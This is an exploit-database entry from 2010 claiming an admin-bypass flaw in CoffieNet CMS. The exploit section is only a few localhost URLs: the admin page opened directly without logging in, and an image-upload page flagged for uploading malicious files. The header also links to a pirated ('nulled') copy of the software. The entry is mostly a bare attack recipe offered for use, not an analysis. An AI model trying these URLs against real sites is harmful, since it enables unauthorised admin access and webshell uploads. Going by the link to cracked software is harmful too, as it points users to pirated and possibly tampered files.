id: 10913
date: 02/15/2010
title: CoffieNet CMS By Pass Admin Vulnerability
author: indoushka
cves: 

=========================================
CoffieNet CMS By Pass Admin Vulnerability 
=========================================

========================================================================================                 
| # Title    : CoffieNet CMs By Pass Admin Vulnerability     
| # Author   : indoushka                                                                                   
| # Web Site : http://www.dl.p30vel.ir/scripts/CoffieNet.CMs.NulLed.Ripped.bY.Eh3an.P30vel.zip                                                                                                                           
| # Dork     :                        
| # Tested on: windows SP2 Fran?ais V.(Pnx2 2.0) + Lunix Fran?ais v.(9.4 Ubuntu)      
| # Bug      : Multi                                                                    
======================      Exploit By indoushka       =================================
# Exploit  :
  
http://127.0.0.1/CoffieNet/admin/admin.php
 
http://127.0.0.1/CoffieNet/admin/admin.php?loc=home
 
http://127.0.0.1/CoffieNet/admin/img_upload.php (2 upload Ev!l)



#  0day.today [2023-03-26]  #